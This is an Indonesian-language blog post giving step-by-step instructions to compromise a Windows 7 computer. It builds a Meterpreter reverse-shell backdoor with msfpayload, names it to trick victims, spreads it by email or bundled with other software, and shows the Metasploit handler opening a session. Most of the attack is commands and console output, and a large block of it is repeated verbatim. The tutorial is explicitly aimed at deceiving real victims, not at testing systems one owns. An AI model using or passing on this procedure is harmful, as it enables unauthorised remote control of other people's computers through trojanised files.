Kali ini saya mau kasih cara Hack system Windows 7 dan akan mengekseskusi system windows dengan Meterpreter.
Steps :
1. Harus buat backdoor (pintu belakang). Untuk membuat backdoor kita bisa akan menggunakan msfpayload,dengan rincian backdoornya sebagai berikut.
192.168.1.166 (alamat IP local)
5555 (port kita gunakan digunakan)
windows/meterpreter/reverse_tcp (payload)
passwordfb.exe (nama backdoor), buat semenarik mungkin agar korban tertipu
2. Tahap pembuatan backdoor
root@warlock:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.166 LPORT=5555 X > passwordfb.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“LHOST”=>”192.168.1.166″, “LPORT”=>”5555″}
3. Setelah backdoor kita buat maka kita dapat melihat dengan perintah
root@warlock:~# ls -l passwordfb.exe
-rw-r–r– 1 root root 0 2011-06-21 04:31 passwordfb.exe
root@warlock:~#
Kalau sudah tinggal kita upload ke komputer korban, sebarin lewat email, digabung dengan aplikasi lain misalnya winamp dll, sesuai kreatifitas kalian.
4. Setelah itu tinggal jalanin servernya pakai metasploit, dan yang perlu diingat adalah data yang dimasukkan ke metasploit harus sesuai dengan yang dibackdoor.
root@warlock:~# msfconsole
____________
< metasploit >
————
\ ,__,
\ (oo)____
(__) )\
||–|| *
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 736 exploits - 377 auxiliary - 82 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13789 updated 5 days ago (2011.09.24)
Warning: This copy of the Metasploit Framework was last updated 119 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projec...i/Updating
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.166
LHOST => 192.168.1.166
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.166:5555
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 192.168.1.180
[*] Meterpreter session 1 opened (192.168.1.166:5555 -> 192.168.1.180:64825) at 2013-07-08 08:35:57 +0700
meterpreter > sysinfo
Computer : ACER-PC
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : id_ID
Meterpreter : x86/win32
192.168.1.166 (alamat IP local)
5555 (port kita gunakan digunakan)
windows/meterpreter/reverse_tcp (payload)
passwordfb.exe (nama backdoor), buat semenarik mungkin agar korban tertipu
2. Tahap pembuatan backdoor
root@warlock:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.166 LPORT=5555 X > passwordfb.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“LHOST”=>”192.168.1.166″, “LPORT”=>”5555″}
3. Setelah backdoor kita buat maka kita dapat melihat dengan perintah
root@warlock:~# ls -l passwordfb.exe
-rw-r–r– 1 root root 0 2011-06-21 04:31 passwordfb.exe
root@warlock:~#
Kalau sudah tinggal kita upload ke komputer korban, sebarin lewat email, digabung dengan aplikasi lain misalnya winamp dll, sesuai kreatifitas kalian.
4. Setelah itu tinggal jalanin servernya pakai metasploit, dan yang perlu diingat adalah data yang dimasukkan ke metasploit harus sesuai dengan yang dibackdoor.
root@warlock:~# msfconsole
____________
< metasploit >
————
\ ,__,
\ (oo)____
(__) )\
||–|| *
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 736 exploits - 377 auxiliary - 82 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13789 updated 5 days ago (2011.09.24)
Warning: This copy of the Metasploit Framework was last updated 119 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projec...i/Updating
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.166
LHOST => 192.168.1.166
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.166:5555
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 192.168.1.180
[*] Meterpreter session 1 opened (192.168.1.166:5555 -> 192.168.1.180:64825) at 2013-07-08 08:35:57 +0700
meterpreter > sysinfo
Computer : ACER-PC
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : id_ID
Meterpreter : x86/win32
*pada shell meterpreter eksekusi lah layaknya administrator windows via cmd **pada kasus ini saya menggunakan sistem operasi Linux BackTrackJKT48 Cyber Team
0 komentar:
Post a Comment